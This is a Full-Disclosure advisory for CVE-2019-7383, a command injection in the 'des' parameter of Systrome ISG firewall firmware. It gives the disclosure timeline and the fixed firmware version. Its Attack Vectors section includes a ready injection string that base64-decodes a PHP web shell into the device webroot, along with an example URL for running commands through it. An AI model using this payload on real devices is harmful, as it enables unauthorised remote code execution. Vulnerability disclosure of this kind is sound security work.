[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] KSA-Dev-003:CVE-2019-7383 : Remote Code Execution Via shell upload in all systorme ISG products
From: Kingkaustubh via Fulldisclosure <fulldisclosure () seclists ! org>
Date: 2019-02-12 9:18:15
Message-ID: c36cd0ee-23f4-1ac2-5b14-ca13dbf939d4 () me ! com
[Download RAW message or body]
=====================================
Authenticated Shell Command Injection
=====================================
. contents:: Table Of Content
Overview
========
Title : Authenticated Shell command Injection
Author: Kaustubh G. Padwad
CVE ID: CVE-2019-7383
Vendor: Systrome Networks (http://systrome.com/about/)
Products:
1.ISG-600C
2.ISG-600H
3.ISG-800W
Tested Version: : ISG-V1.1-R2.1_TRUNK-20181105.bin(Respetive for others)
Severity: High--Critical
Advisory ID
============
KSA-Dev-003
About the Product:
==================
Cumilon ISG-* cloud gateway is the security product developed by Systrome for the distributed \
access network for the cloud-computing era. It integrates the L2-L7security features of the \
next-generation firewall, is based on the user identification and application identification \
and provides the application-layer firewall, intrusion prevention, anti-virus, anti-APT, VPN, \
intelligent bandwidth management, multi-egress link load balancing, content filtering, URL \
filtering, and other security functions. It provides the cloud interface. The security cloud \
management platform based on the big data platform architecture can monitor the network \
topology and device status in real time, simplifying the online deployment of the professional \
device via the auto configuration delivery. The real-time monitoring of the mobile terminal \
reduces the maintenance cost and makes the security visible at any time and anywhere. Systrome \
cloud gateway is the best access security choice of the middle and smal l enterprises, branch \
interconnection, and chain enterprises.
Description:
============
An issue was discovered on Systrome Cumilon ISG-600C, ISG-600H, and ISG-800W devices with \
firmware V1.1-R2.1_TRUNK-20181105.bin. A shell command injection occurs by editing the \
description of an ISP file. The file network/isp/isp_update_edit.php does not properly validate \
user input, which leads to shell command injection via the des parameter.
[Additional_information]
The php file ./network/isp/isp_update_edit.php dose not properly validate the user input which \
leads to to shell command injection. below is the vulnerable code snipet "<td><input \
name="des" id="des" value="<?php echo $item['des'];?>" type="text" <?php echo $item['des'];?> \
size="50" maxlength="<?php echo XML_MAX_DESC_LEN;?>"/><"
[VulnerabilityType Other]
Authenticated Shell Command Injection
[Affected Component]
The php file ./network/isp/isp_update_edit.php dose not properly validate the user input which \
leads to to shell command injection. below is the vulnerable code snippet "<td><input \
name="des" id="des" value="<?php echo $item['des'];?>" type="text" <?
[Attack Type]
Local
[Impact Code execution]
true
[Attack Vectors]
visit the url http://device_ip/network/isp/isp_update_edit.php?pv=ISP_INTL.dat
adding the strings below will add a php system command shell in the webroot of the device:
'`echo PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4KCg== | base64 -d > \
/usr/local/wwwroot/cmd.php`'
the php system shell can then be accessed via browser, e.g: \
http://device_ip/cmd.php?cmd=ifconfig
Mitigation
==========
This issue is fixed in ISG-V1.1-R2.1_TRUNK-20181229.bin
Disclosure:
===========
10-Dec-2018 Discoverd the Vulnerability
10-DEC-2018 Reported to vendor
04-JAN-2019 Recived the fixed from vendor
04-JAN-2019 Request for the CVE-ID
04-FEB-2019 CVE ID Assign.
08-FEB-2019 Advisiory Published.
[Discoverer]
* Kaustubh Padwad,
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic